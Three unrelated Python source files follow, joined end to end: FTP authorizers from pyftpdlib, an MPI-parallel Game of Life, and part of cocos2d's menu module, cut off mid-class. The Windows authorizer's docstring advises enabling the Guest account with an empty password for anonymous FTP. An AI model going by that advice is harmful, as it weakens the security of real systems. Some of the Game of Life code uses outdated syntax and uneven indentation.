pwd.getpwnam(self.anonymous_user).pw_dir
except KeyError:
raise ValueError('no such user %s' % anonymous_user)
# --- overridden / private API
def validate_authentication(self, username, password):
"""Authenticates against shadow password db; return
True on success.
"""
if username == "anonymous":
return self.anonymous_user is not None
try:
pw1 = spwd.getspnam(username).sp_pwd
pw2 = crypt.crypt(password, pw1)
except KeyError: # no such username
return False
else:
return pw1 == pw2
@replace_anonymous
def impersonate_user(self, username, password):
"""Change process effective user/group ids to reflect
logged in user.
"""
try:
pwdstruct = pwd.getpwnam(username)
except KeyError:
raise AuthorizerError('no such user %s' % username)
else:
os.setegid(pwdstruct.pw_gid)
os.seteuid(pwdstruct.pw_uid)
def terminate_impersonation(self, username):
"""Revert process effective user/group IDs."""
os.setegid(PROCESS_GID)
os.seteuid(PROCESS_UID)
@replace_anonymous
def has_user(self, username):
"""Return True if user exists on the Unix system.
If the user has been black listed via allowed_users or
rejected_users options always return False.
"""
return username in self._get_system_users()
@replace_anonymous
def get_home_dir(self, username):
"""Return user home directory."""
try:
return pwd.getpwnam(username).pw_dir
except KeyError:
raise AuthorizerError('no such user %s' % username)
@staticmethod
def _get_system_users():
"""Return all users defined on the UNIX system."""
return [entry.pw_name for entry in pwd.getpwall()]
def get_msg_login(self, username):
return "Login successful."
def get_msg_quit(self, username):
return "Goodbye."
def get_perms(self, username):
return "elradfmw"
def has_perm(self, username, perm, path=None):
return perm in self.get_perms(username)
class UnixAuthorizer(_Base, BaseUnixAuthorizer):
"""A wrapper on top of BaseUnixAuthorizer providing options
to specify what users should be allowed to login, per-user
options, etc.
Example usages:
>>> from pyftpdlib.contrib.authorizers import UnixAuthorizer
>>> # accept all except root
>>> auth = UnixAuthorizer(rejected_users=["root"])
>>>
>>> # accept some users only
>>> auth = UnixAuthorizer(allowed_users=["matt", "jay"])
>>>
    >>> # accept everybody and don't require a valid shell
>>> auth = UnixAuthorizer(require_valid_shell=False)
>>>
>>> # set specific options for a user
>>> auth.override_user("matt", password="foo", perm="elr")
"""
# --- public API
def __init__(self, global_perm="elradfmw",
allowed_users=[],
rejected_users=[],
require_valid_shell=True,
anonymous_user=None,
msg_login="Login successful.",
msg_quit="Goodbye."):
"""Parameters:
- (string) global_perm:
a series of letters referencing the users permissions;
defaults to "elradfmw" which means full read and write
access for everybody (except anonymous).
- (list) allowed_users:
a list of users which are accepted for authenticating
against the FTP server; defaults to [] (no restrictions).
- (list) rejected_users:
a list of users which are not accepted for authenticating
against the FTP server; defaults to [] (no restrictions).
- (bool) require_valid_shell:
Deny access for those users which do not have a valid shell
binary listed in /etc/shells.
If /etc/shells cannot be found this is a no-op.
Anonymous user is not subject to this option, and is free
to not have a valid shell defined.
Defaults to True (a valid shell is required for login).
- (string) anonymous_user:
specify it if you intend to provide anonymous access.
The value expected is a string representing the system user
to use for managing anonymous sessions; defaults to None
(anonymous access disabled).
- (string) msg_login:
the string sent when client logs in.
- (string) msg_quit:
the string sent when client quits.
"""
BaseUnixAuthorizer.__init__(self, anonymous_user)
self.global_perm = global_perm
self.allowed_users = allowed_users
self.rejected_users = rejected_users
self.anonymous_user = anonymous_user
self.require_valid_shell = require_valid_shell
self.msg_login = msg_login
self.msg_quit = msg_quit
self._dummy_authorizer = DummyAuthorizer()
self._dummy_authorizer._check_permissions('', global_perm)
_Base.__init__(self)
if require_valid_shell:
for username in self.allowed_users:
if not self._has_valid_shell(username):
raise ValueError("user %s has not a valid shell"
% username)
def override_user(self, username, password=None, homedir=None, perm=None,
msg_login=None, msg_quit=None):
"""Overrides the options specified in the class constructor
for a specific user.
"""
if self.require_valid_shell and username != 'anonymous':
if not self._has_valid_shell(username):
raise ValueError("user %s has not a valid shell"
% username)
_Base.override_user(self, username, password, homedir, perm,
msg_login, msg_quit)
# --- overridden / private API
def validate_authentication(self, username, password):
if username == "anonymous":
return self.anonymous_user is not None
if self._is_rejected_user(username):
return False
if self.require_valid_shell and username != 'anonymous':
if not self._has_valid_shell(username):
return False
overridden_password = self._get_key(username, 'pwd')
if overridden_password:
return overridden_password == password
return BaseUnixAuthorizer.validate_authentication(self, username, password)
@replace_anonymous
def has_user(self, username):
if self._is_rejected_user(username):
return False
return username in self._get_system_users()
@replace_anonymous
def get_home_dir(self, username):
overridden_home = self._get_key(username, 'home')
if overridden_home:
return overridden_home
return BaseUnixAuthorizer.get_home_dir(self, username)
@staticmethod
def _has_valid_shell(username):
"""Return True if the user has a valid shell binary listed
in /etc/shells. If /etc/shells can't be found return True.
"""
file = None
try:
try:
file = open('/etc/shells', 'r')
except IOError as err:
if err.errno == errno.ENOENT:
return True
raise
else:
try:
shell = pwd.getpwnam(username).pw_shell
except KeyError: # invalid user
return False
for line in file:
if line.startswith('#'):
continue
line = line.strip()
if line == shell:
return True
return False
finally:
if file is not None:
file.close()
# Note: requires pywin32 extension
try:
import _winreg
import win32security
import win32net
import pywintypes
import win32con
import win32api
except ImportError:
pass
else:
__all__.extend(['BaseWindowsAuthorizer', 'WindowsAuthorizer'])
class BaseWindowsAuthorizer(object):
"""An authorizer compatible with Windows user account and
password database.
This class should not be used directly unless for subclassing.
        Use higher-level WindowsAuthorizer class instead.
"""
def __init__(self, anonymous_user=None, anonymous_password=None):
# actually try to impersonate the user
self.anonymous_user = anonymous_user
self.anonymous_password = anonymous_password
if self.anonymous_user is not None:
self.impersonate_user(self.anonymous_user,
self.anonymous_password)
self.terminate_impersonation()
def validate_authentication(self, username, password):
if username == "anonymous":
return self.anonymous_user is not None
try:
win32security.LogonUser(username, None, password,
win32con.LOGON32_LOGON_INTERACTIVE,
win32con.LOGON32_PROVIDER_DEFAULT)
except pywintypes.error:
return False
else:
return True
@replace_anonymous
def impersonate_user(self, username, password):
"""Impersonate the security context of another user."""
handler = win32security.LogonUser(username, None, password,
win32con.LOGON32_LOGON_INTERACTIVE,
win32con.LOGON32_PROVIDER_DEFAULT)
win32security.ImpersonateLoggedOnUser(handler)
handler.Close()
def terminate_impersonation(self, username):
"""Terminate the impersonation of another user."""
win32security.RevertToSelf()
@replace_anonymous
def has_user(self, username):
return username in self._get_system_users()
@replace_anonymous
def get_home_dir(self, username):
"""Return the user's profile directory, the closest thing
to a user home directory we have on Windows.
"""
try:
sid = win32security.ConvertSidToStringSid(
win32security.LookupAccountName(None, username)[0])
except pywintypes.error as err:
raise AuthorizerError(err)
path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" + \
"\\" + sid
try:
key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, path)
except WindowsError:
raise AuthorizerError("No profile directory defined for user %s"
% username)
value = _winreg.QueryValueEx(key, "ProfileImagePath")[0]
return win32api.ExpandEnvironmentStrings(value)
@classmethod
def _get_system_users(cls):
"""Return all users defined on the Windows system."""
return [entry['name'] for entry in win32net.NetUserEnum(None, 0)[0]]
def get_msg_login(self, username):
return "Login successful."
def get_msg_quit(self, username):
return "Goodbye."
def get_perms(self, username):
return "elradfmw"
def has_perm(self, username, perm, path=None):
return perm in self.get_perms(username)
class WindowsAuthorizer(_Base, BaseWindowsAuthorizer):
"""A wrapper on top of BaseWindowsAuthorizer providing options
to specify what users should be allowed to login, per-user
options, etc.
Example usages:
>>> from pyftpdlib.contrib.authorizers import WindowsAuthorizer
>>> # accept all except Administrator
        >>> auth = WindowsAuthorizer(rejected_users=["Administrator"])
        >>>
        >>> # accept some users only
        >>> auth = WindowsAuthorizer(allowed_users=["matt", "jay"])
>>>
>>> # set specific options for a user
>>> auth.override_user("matt", password="foo", perm="elr")
"""
# --- public API
def __init__(self, global_perm="elradfmw",
allowed_users=[],
rejected_users=[],
anonymous_user=None,
anonymous_password=None,
msg_login="Login successful.",
msg_quit="Goodbye."):
"""Parameters:
- (string) global_perm:
a series of letters referencing the users permissions;
defaults to "elradfmw" which means full read and write
access for everybody (except anonymous).
- (list) allowed_users:
a list of users which are accepted for authenticating
against the FTP server; defaults to [] (no restrictions).
- (list) rejected_users:
a list of users which are not accepted for authenticating
against the FTP server; defaults to [] (no restrictions).
- (string) anonymous_user:
specify it if you intend to provide anonymous access.
The value expected is a string representing the system user
to use for managing anonymous sessions.
As for IIS, it is recommended to use Guest account.
The common practice is to first enable the Guest user, which
is disabled by default and then assign an empty password.
Defaults to None (anonymous access disabled).
- (string) anonymous_password:
the password of the user who has been chosen to manage the
anonymous sessions. Defaults to None (empty password).
- (string) msg_login:
the string sent when client logs in.
- (string) msg_quit:
the string sent when client quits.
"""
self.global_perm = global_perm
self.allowed_users = allowed_users
self.rejected_users = rejected_users
self.anonymous_user = anonymous_user
self.anonymous_password = anonymous_password
self.msg_login = msg_login
self.msg_quit = msg_quit
self._dummy_authorizer = DummyAuthorizer()
self._dummy_authorizer._check_permissions('', global_perm)
_Base.__init__(self)
# actually try to impersonate the user
if self.anonymous_user is not None:
self.impersonate_user(self.anonymous_user,
self.anonymous_password)
self.terminate_impersonation()
def override_user(self, username, password=None, homedir=None, perm=None,
msg_login=None, msg_quit=None):
"""Overrides the options specified in the class constructor
for a specific user.
"""
_Base.override_user(self, username, password, homedir, perm,
msg_login, msg_quit)
# --- overridden / private API
def validate_authentication(self, username, password):
"""Authenticates against Windows user database; return
True on success.
"""
if username == "anonymous":
return self.anonymous_user is not None
if self.allowed_users and username not in self.allowed_users:
return False
if self.rejected_users and username in self.rejected_users:
return False
overridden_password = self._get_key(username, 'pwd')
if overridden_password:
return overridden_password == password
else:
return BaseWindowsAuthorizer.validate_authentication(self,
username, password)
def impersonate_user(self, username, password):
"""Impersonate the security context of another user."""
if username == "anonymous":
username = self.anonymous_user or ""
password = self.anonymous_password or ""
return BaseWindowsAuthorizer.impersonate_user(self, username, password)
@replace_anonymous
def has_user(self, username):
if self._is_rejected_user(username):
return False
return username in self._get_system_users()
@replace_anonymous
def get_home_dir(self, username):
overridden_home = self._get_key(username, 'home')
if overridden_home:
return overridden_home
return BaseWindowsAuthorizer.get_home_dir(self, username)
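# ---------------------------------------------------------------------------
# Minimal usage sketch, assuming a Unix system where the pwd/spwd imports
# above succeeded and the process runs as root (UnixAuthorizer needs super
# user privileges to read the shadow password database). It follows the
# typical pyftpdlib.ftpserver pattern; the port number is arbitrary.
if __name__ == '__main__':
    from pyftpdlib import ftpserver
    authorizer = UnixAuthorizer(rejected_users=["root"],
                                require_valid_shell=True)
    handler = ftpserver.FTPHandler
    handler.authorizer = authorizer
    server = ftpserver.FTPServer(("", 2121), handler)
    server.serve_forever()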
|
|
try:
from numba import autojit
except ImportError:
print "Unable to import numba, life_step will not be accelerated"
def autojit(func):
return func
import itertools
import numpy as np
from mpi4py import MPI
def communicate(grid, left, right, up, down):
""" Communicates grid data.
Performs a simulated inner 'put' from grid into two left-right neighbors, then a full 'put' from grid into up-down neighbors"""
    if left is not None:
        left[1:-1,-1] = grid[1:-1,1]
    if right is not None:
        right[1:-1,0] = grid[1:-1,-2]
    if up is not None:
        up[-1,:] = grid[1,:]
    if down is not None:
        down[0,:] = grid[-2,:]
def parallel_communicate(grid, left, right, up, down):
""" Communicates parallel grid data.
Performs a simulated inner 'put' from grid into two left-right neighbors, then a full 'put' from grid into up-down neighbors"""
    if left is not None:
        left[1:-1,-1] = grid[1:-1,1]
    if right is not None:
        right[1:-1,0] = grid[1:-1,-2]
    if up is not None:
        up[-1,:] = grid[1,:]
    if down is not None:
        down[0,:] = grid[-2,:]
def build_grids(A, ng):
"""Create a decomposition of the grids on A"""
shape = A.shape
    gridl = [s//n for s,n in zip(shape,ng)]
gs = [[l * i for i in range(ngi)] for ngi,l in zip(ng,gridl)]
gs = list(itertools.product(*gs))
slices = [[(slice(i,i+l)) for i, l in zip(gsi,gridl)] for gsi in gs]
sliceA = [slice(0,s) for s in shape]
return sliceA, slices, [A[i] for i in slices]
def build_local_grids(A, ng):
"""Create a copy of the local grids on A"""
shape = A.shape
    gridl = [s//n for s,n in zip(shape,ng)]
lgs = [[l*i-1 if i > 0 else 0 for i in range(ngi)] for ngi,l in zip(ng, gridl)]
lge = [[l*(i+1)+1 if i+1 < ngi else l*(i+1) for i in range(ngi)] for ngi,l in zip(ng, gridl)]
lgs = list(itertools.product(*lgs))
lge = list(itertools.product(*lge))
lslices = [[slice(i,j) for i, j in zip(gsi, gei)] for gsi, gei in zip(lgs, lge)]
return [A[i].copy() for i in lslices]
class Comms:
"""encapsulates cartesian communications"""
def __init__(self):
size = MPI.COMM_WORLD.Get_size()
ngs = int(np.sqrt(size))
ng = [ngs, ngs]
cart = MPI.COMM_WORLD.Create_cart(ng, reorder=True)
self.left_buf = None
self.right_buf = None
coords = cart.coords
c = np.asarray(coords)
self.ng = ng
self.cart = cart
self.reqs = []
# get neighbors filtered by boundaries
self.left = cart.Get_cart_rank(c - [0,1]) if c[1] > 0 else None
self.right = cart.Get_cart_rank(c + [0,1]) if c[1] < ng[1] - 1 else None
self.down = cart.Get_cart_rank(c - [1,0]) if c[0] > 0 else None
self.up = cart.Get_cart_rank(c + [1,0]) if c[0] < ng[0] - 1 else None
self.left_sbuf = None
self.left_rbuf = None
self.right_sbuf = None
self.right_rbuf = None
self.buffered_grid = None
rank = self.cart.Get_rank()
def comm_start_1(self, grid):
cart = self.cart
# special handling for non-contiguous data
if self.left_sbuf is None:
self.left_sbuf = np.empty((grid.shape[0]-2), np.int)
if self.left_rbuf is None:
self.left_rbuf = np.empty((grid.shape[0]-2), np.int)
if self.right_sbuf is None:
self.right_sbuf = np.empty((grid.shape[0]-2), np.int)
if self.right_rbuf is None:
self.right_rbuf = np.empty((grid.shape[0]-2), np.int)
if self.left is not None:
self.left_sbuf[:] = grid[1:-1, 1]
self.reqs += [cart.Irecv(self.left_rbuf, self.left),
cart.Isend(self.left_sbuf, self.left)]
if self.right is not None:
self.right_sbuf[:] = grid[1:-1,-2]
self.reqs += [cart.Irecv(self.right_rbuf, self.right),
cart.Isend(self.right_sbuf, self.right)]
self.buffered_grid = grid
def comm_start_2(self, grid):
cart = self.cart
if self.up is not None:
self.reqs += [cart.Irecv(grid[-1,:], self.up),
cart.Isend(grid[-2,:], self.up)]
if self.down is not None:
self.reqs += [cart.Irecv(grid[0,:], self.down),
cart.Isend(grid[1,:], self.down)]
def comm_end(self):
rank = self.cart.Get_rank()
MPI.Request.Waitall(self.reqs)
if self.buffered_grid is not None:
if self.right is not None:
self.buffered_grid[1:-1,-1] = self.right_rbuf[:]
if self.left is not None:
self.buffered_grid[1:-1, 0] = self.left_rbuf[:]
self.buffered_grid = None
def setup_parallel():
"""Builds and distributes parallel grids"""
comms = Comms()
shape = (64,64)
A = np.random.randint(0,2,shape)
cart = comms.cart
ng = comms.ng
A = cart.bcast(A)
rank = cart.Get_rank()
my_coords = cart.Get_coords(rank)
gridl = [s // n for s, n in zip(shape, ng)]  # integer block sizes
gs = [l * i for i, l in zip(my_coords, gridl)]
ge = [l * (i + 1) for i, l in zip(my_coords, gridl)]
lgs = [l*i-1 if i > 0 else 0 for i, l in zip(my_coords, gridl)]
lge = [l*(i+1)+1 if l*(i+1)+1 <= s else l*(i+1) for i, l, s in zip(my_coords, gridl, shape)]
sg = tuple(slice(s, e) for s, e in zip(gs, ge))
sl = tuple(slice(s, e) for s, e in zip(lgs, lge))
grid = A[sg]
l1 = A[sl]
l2 = l1.copy()
return A, l1, l2, sg, grid, comms
def setup_4(A, local_grids, ng):
l_00, l_01, l_10, l_11 = [grid for grid in local_grids]
n_00 = (None, l_01, None, l_10)
n_01 = (l_00, None, None, l_11)
n_10 = (None, l_11, l_00, None)
n_11 = (l_10, None, l_01, None)
shape = A.shape
gridl = [s // n for s, n in zip(shape, ng)]  # integer sizes, used as indices below
m0 = gridl[0]
m1 = gridl[1]
g_00 = l_00[:m0,:m1]
l_00[m0,:] = 0
l_00[1:m0-1,m1] = 0
g_01 = l_01[:m0,1:]
l_01[m0,:] = 0
l_01[1:m0-1,0] = 0
g_10 = l_10[1:,:m1]
l_10[0,:] = 0
l_10[1:m0-1,m1] = 0
g_11 = l_11[1:,1:]
l_11[0,:] = 0
l_11[1:m1-1,0] = 0
def comm_all():
communicate(l_00, *n_00[:2] + (None, None))
communicate(l_01, *n_01[:2] + (None, None))
communicate(l_10, *n_10[:2] + (None, None))
communicate(l_11, *n_11[:2] + (None, None))
communicate(l_00, *(None, None) + n_00[2:])
communicate(l_01, *(None, None) + n_01[2:])
communicate(l_10, *(None, None) + n_10[2:])
communicate(l_11, *(None, None) + n_11[2:])
grids = (g_00, g_01, g_10, g_11)
return grids, comm_all
@autojit
def life_step(g, gnew):
"""Given a grid, compute one Game of Life step along the interior of the grid into gnew"""
m,n = g.shape
for i in range(1,m-1):
for j in range(1,n-1):
total = 0  # live-neighbor count (avoid shadowing the builtin sum)
for ii in range(i-1,i+2):
for jj in range(j-1,j+2):
if ii == i and jj == j:
continue
total += g[ii,jj]
if total < 2 or total > 3:
gnew[i,j] = 0
elif total == 3:
gnew[i,j] = 1
else:
gnew[i,j] = g[i,j]
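# Minimal driver sketch (added for illustration; `steps` and the function name are
# assumptions, not part of the original file). It wires setup_parallel(), the Comms
# halo-exchange methods and life_step() into one exchange/compute loop.
def run_parallel_life(steps=10):
    A, l1, l2, sg, grid, comms = setup_parallel()
    for _ in range(steps):
        comms.comm_start_1(l1)   # post left/right ghost-column exchange
        comms.comm_start_2(l1)   # post up/down ghost-row exchange
        comms.comm_end()         # wait until all halo data has arrived
        life_step(l1, l2)        # update the interior using the fresh ghost cells
        l1, l2 = l2, l1          # swap buffers for the next iteration
    return l1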
|
|
# ----------------------------------------------------------------------------
# cocos2d
# Copyright (c) 2008-2012 Daniel Moisset, Ricardo Quesada, Rayentray Tappa,
# Lucio Torre
# Copyright (c) 2009-2014 Richard Jones, Claudio Canepa
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of cocos2d nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
#
# Ideas borrowed from:
# pygext: http://opioid-interactive.com/~shang/projects/pygext/
# pyglet astraea: http://www.pyglet.org
# Grossini's Hell: http://www.pyweek.org/e/Pywiii/
#
"""A `Layer` that implements a simple menu
Menu
====
This module provides a Menu class. Menus can contain regular items
(which trigger a function when selected), toggle items (which toggle a flag when selected),
or entry items (which let you enter alphanumeric data).
To use a menu in your code, just subclass `Menu` and add the menu to a `Scene` or
another `Layer`.
"""
from __future__ import division, print_function, unicode_literals
from six import string_types
__docformat__ = 'restructuredtext'
import pyglet
from pyglet import font
from pyglet.window import key
from pyglet.gl import *
import pyglet.graphics
from cocos.layer import *
from cocos.director import *
from cocos.cocosnode import *
from cocos.actions import *
from cocos.sprite import Sprite
from cocos import rect
__all__ = [ 'Menu', # menu class
'MenuItem', 'ToggleMenuItem', # menu items classes
'MultipleMenuItem', 'EntryMenuItem', 'ImageMenuItem',
'ColorMenuItem',
'verticalMenuLayout', 'fixedPositionMenuLayout', # Different menu layout functions
'CENTER', 'LEFT', 'RIGHT', 'TOP', 'BOTTOM', # menu alignment
'shake', 'shake_back','zoom_in','zoom_out' # Some useful actions for the menu items
]
#
# Class Menu
#
# Horizontal Align
CENTER = font.Text.CENTER
LEFT = font.Text.LEFT
RIGHT = font.Text.RIGHT
# Vertical Align
TOP = font.Text.TOP
BOTTOM = font.Text.BOTTOM
def verticalMenuLayout (menu):
width, height = director.get_window_size()
fo = font.load(menu.font_item['font_name'], menu.font_item['font_size'])
fo_height = int( (fo.ascent - fo.descent) * 0.9 )
if menu.menu_halign == CENTER:
pos_x = width // 2
elif menu.menu_halign == RIGHT:
pos_x = width - menu.menu_hmargin
elif menu.menu_halign == LEFT:
pos_x = menu.menu_hmargin
else:
raise Exception("Invalid anchor_x value for menu")
for idx,i in enumerate( menu.children):
item = i[1]
if menu.menu_valign == CENTER:
pos_y = (height + (len(menu.children) - 2 * idx)
* fo_height - menu.title_height) * 0.5
elif menu.menu_valign == TOP:
pos_y = (height - ((idx + 0.8) * fo_height )
- menu.title_height - menu.menu_vmargin)
elif menu.menu_valign == BOTTOM:
pos_y = (0 + fo_height * (len(menu.children) - idx) +
menu.menu_vmargin)
item.transform_anchor = (pos_x, pos_y)
item.generateWidgets (pos_x, pos_y, menu.font_item,
menu.font_item_selected)
def fixedPositionMenuLayout (positions):
def fixedMenuLayout(menu):
width, height = director.get_window_size()
for idx,i in enumerate( menu.children):
item = i[1]
pos_x = positions[idx][0]
pos_y = positions[idx][1]
item.transform_anchor = (pos_x, pos_y)
item.generateWidgets (pos_x, pos_y, menu.font_item,
menu.font_item_selected)
return fixedMenuLayout
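# Usage note (illustrative; not part of the original module): a layout function is
# passed to Menu.create_menu() through its `layout_strategy` argument, e.g. inside
# a Menu subclass (the coordinates below are assumed example positions, one per item):
#
#   self.create_menu(items,
#                    layout_strategy=fixedPositionMenuLayout([(320, 200), (320, 150)]))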
class Menu(Layer):
"""Abstract base class for menu layers.
Normal usage is:
- create a subclass
- override __init__ to set all style attributes,
and then call `create_menu()`
- Finally, add the menu to a `Scene` or another `Layer`
"""
is_event_handler = True #: Receives pyglet events
select_sound = None
activate_sound = None
def __init__( self, title = ''):
super(Menu, self).__init__()
#
# Items and Title
#
self.title = title
self.title_text = None
self.menu_halign = CENTER
self.menu_valign = CENTER
self.menu_hmargin = 2 # Variable margins for left and right alignment
self.menu_vmargin = 2 # Variable margins for top and bottom alignment
#
# Menu default options
# Menus can be customized changing these variables
#
# Title
self.font_title = {
'text':'title',
'font_name':'Arial',
'font_size':56,
'color':(192,192,192,255),
'bold':False,
'italic':False,
'anchor_y':'center',
'anchor_x':'center',
'dpi':96,
'x':0, 'y':0,
}
self.font_item= {
'font_name':'Arial',
'font_size':32,
'bold':False,
'italic':False,
'anchor_y':'center',
'anchor_x':'center',
'color':(192,192,192,255),
'dpi':96,
}
self.font_item_selected = {
'font_name':'Arial',
'font_size':42,
'bold':False,
'italic':False,
'anchor_y':'center',
'anchor_x':'center',
'color':(255,255,255,255),
'dpi':96,
}
self.title_height = 0
self.schedule(lambda dt: None)
def _generate_title( self ):
width, height = director.get_window_size()
self.font_title['x'] = width // 2
self.font_title['text'] = self.title
self.title_label = pyglet.text.Label( **self.font_title )
self.title_label.y = height - self.title_label.content_height //2
fo = font.load( self.font_title['font_name'], self.font_title['font_size'] )
self.title_height = self.title_label.content_height
def _build_items(self, layout_strategy):
self.font_item_selected['anchor_x'] = self.menu_halign
self.font_item_selected['anchor_y'] = 'center'
self.font_item['anchor_x'] = self.menu_halign
self.font_item['anchor_y'] = 'center'
layout_strategy(self)
self.selected_index = 0
self.children[ self.selected_index ][1].is_selected = True
def _select_item(self, new_idx):
if new_idx == self.selected_index:
return
if self.select_sound:
self.select_sound.play()
self.children[ self.selected_index][1].is_selected = False
self.children[ self.selected_index][1].on_unselected()
self.children[ new_idx ][1].is_selected = True
self.children[ new_idx ][1].on_selected()
self.selected_index = new_idx
def _activate_item( self ):
if self.activate_sound:
self.activate_sound.play()
self.children[ self.selected_index][1].on_activated()
self.children[ self.selected_index ][1].on_key_press( key.ENTER, 0 )
def create_menu(self, items, selected_effect=None, unselected_effect=None,
activated_effect=None, layout_strategy=verticalMenuLayout):
"""Creates the menu
The order of the list is important since the
first item will be shown first.
Example::
l = []
l.append( MenuItem('Options', self.on_new_game ) )
l.append( MenuItem('Quit', self.on_quit ) )
self.create_menu( l, zoom_in(), zoom_out() )
:Parameters:
`items` : list
list of `BaseMenuItem` that will be part of the `Menu`
`selected_effect` : function
This action will be executed when the `BaseMenuItem` is selected
`unselected_effect` : function
This action will be executed when the `BaseMenuItem` is unselected
`activated_effect` : function
This action will be executed when the `BaseMenuItem` is activated (by pressing Enter or by clicking on it)
"""
z=0
for i in items:
# calling super.add(). Z is important to maintain order
self.add( i, z=z )
i.activated_effect = activated_effect
i.selected_effect = selected_effect
i.unselected_effect = unselected_effect
i.item_halign = self.menu_halign
i.item_valign = self.menu_valign
z += 1
self._generate_title() # the title must be generated before the items; otherwise
# the vertical position of the items can't account for the title's height
if items:
self._build_items(layout_strategy)
def draw( self ):
glPushMatrix()
self.transform()
self.title_label.draw()
glPopMatrix()
def on_text( self, text ):
if text=='\r':
return
return self.children[self.selected_index][1].on_text(text)
def on_key_press(self, symbol, modifiers):
if symbol == key.ESCAPE:
self.on_quit()
return True
elif symbol in (key.ENTER, key.NUM_ENTER):
self._activate_item()
return True
elif symbol in (key.DOWN, key.UP):
if symbol == key.DOWN:
new_idx = self.selected_index + 1
elif symbol == key.UP:
new_idx = self.selected_index - 1
if new_idx < 0:
new_idx = len(self.children) -1
elif new_idx > len(self.children) -1:
new_idx = 0
self._select_item( new_idx )
return True
else:
# send the menu item the rest of the keys
ret = self.children[self.selected_index][1].on_key_press(symbol, modifiers)
# play sound if key was handled
if ret and self.activate_sound:
self.activate_sound.play()
return ret
def on_mouse_release( self, x, y, buttons, modifiers ):
(x,y) = director.get_virtual_coordinates(x,y)
if self.children[ self.selected_index ][1].is_inside_box(x,y):
self._activate_item()
def on_mouse_motion( self, x, y, dx, dy ):
(x,y) = director.get_virtual_coordinates(x,y)
for idx,i in enumerate( self.children):
item = i[1]
if item.is_inside_box( x, y):
self._select_item( idx )
break
class BaseMenuItem( CocosNode ):
"""An abstract menu item. It triggers a function when it is activated"""
selected_effect = None
unselected_effect = None
activated_effect = None
def __init__(self, callback_func, *args, **kwargs):
"""Creates a new menu item
:Parameters:
`callback_func` : function
The callback function
"""
super( BaseMenuItem, self).__init__()
self.callback_func = callback_func
self.callback_args = args
self.callback_kwargs = kwargs
self.is_selected = False
self.item_halign = None
self.item_valign = None
self.item = None
self.item_selected = None
def get_item_width (self):
""" Returns the width of the item.
This method should be implemented by descendents.
:rtype: int
"""
return self.item.width
def get_item_height (self):
""" Returns the width of the item.
This method should be implemented by descendents.
:rtype: int
"""
return self.item.height
def generateWidgets (self, pos_x, pos_y, font_item, font_item_selected):
""" Generate a normal and a selected widget.
This method should be implemented by descendents.
"""
raise NotImplementedError
def get_item_x (self):
""" Return the x position of the item.
This method should be implemented by descendents.
:rtype: int
"""
return self.item.x
def get_item_y (self):
""" Return the y position of the item.
This method should be implemented by descendents.
:rtype: int
"""
return self.item.y
def get_box( self ):
"""Returns the box that contains the menu item.
:rtype: (x1,x2,y1,y2)
"""
width = self.get_item_width ()
height = self.get_item_height ()
if self.item_halign == CENTER:
x_diff = - width / 2
elif self.item_halign == RIGHT:
x_diff = - width
elif self.item_halign == LEFT:
x_diff = 0
else:
raise Exception("Invalid halign: %s" % str(self.item_halign) )
y_diff = - height/ 2
x1 = self.get_item_x() + x_diff
y1 = self.get_item_y() + y_diff
# x1 += self.parent.x
# y1 += self.parent.y
# x2 = x1 + width
# y2 = y1 + height
# return (x1,y1,x2,y2)
return rect.Rect(x1,y1,width,height)
def draw( self ):
raise NotImplementedError
def on_key_press(self, symbol, modifiers):
if symbol == key.ENTER and self.callback_func:
self.callback_func(*self.callback_args, **self.callback_kwargs)
return True
def on_text( self, text ):
return True
def is_inside_box( self, x, y ):
"""Returns whether the point (x,y) is inside the menu item.
:rtype: bool
"""
# (ax,ay,bx,by) = self.get_box()
# if( x >= ax and x <= bx and y >= ay and y <= by ):
# return True
# return False
rect = self.get_box()
p = self.point_to_local( (x,y) )
return rect.contains( p.x, p.y )
def on_selected( self ):
if self.selected_effect:
self.stop()
self.do( self.selected_effect )
def on_unselected( self ):
if self.unselected_effect:
self.stop()
self.do( self.unselected_effect )
def on_activated( self ):
if self.activated_effect:
self.stop()
self.do( self.activated_effect )
class MenuItem (BaseMenuItem):
"""A menu item that shows a label. """
def __init__ (self, label, callback_func, *args, **kwargs):
"""Creates a new menu item
:Parameters:
`label` : string
The label the of the menu item
`callback_func` : function
The callback function
"""
self.label = label
super (MenuItem, self).__init__(callback_func, *args, **kwargs)
def get_item_width (self):
return self.item.content_width
def get_item_height (self):
return self.item.content_height
def generateWidgets (self, pos_x, pos_y, font_item, font_item_selected):
font_item['x'] = int(pos_x)
font_item['y'] = int(pos_y)
font_item['text'] = self.label
self.item = pyglet.text.Label(**font_item )
font_item_selected['x'] = int(pos_x)
font_item_selected['y'] = int(pos_y)
font_item_selected['text'] = self.label
self.item_selected = pyglet.text.Label( **font_item_selected )
def draw( self ):
glPushMatrix()
self.transform()
if self.is_selected:
self.item_selected.draw()
else:
self.item.draw()
glPopMatrix()
class ImageMenuItem (BaseMenuItem):
""" A menu item that shows a selectable Image """
def __init__ (self, image, callback_func, *args, **kwargs):
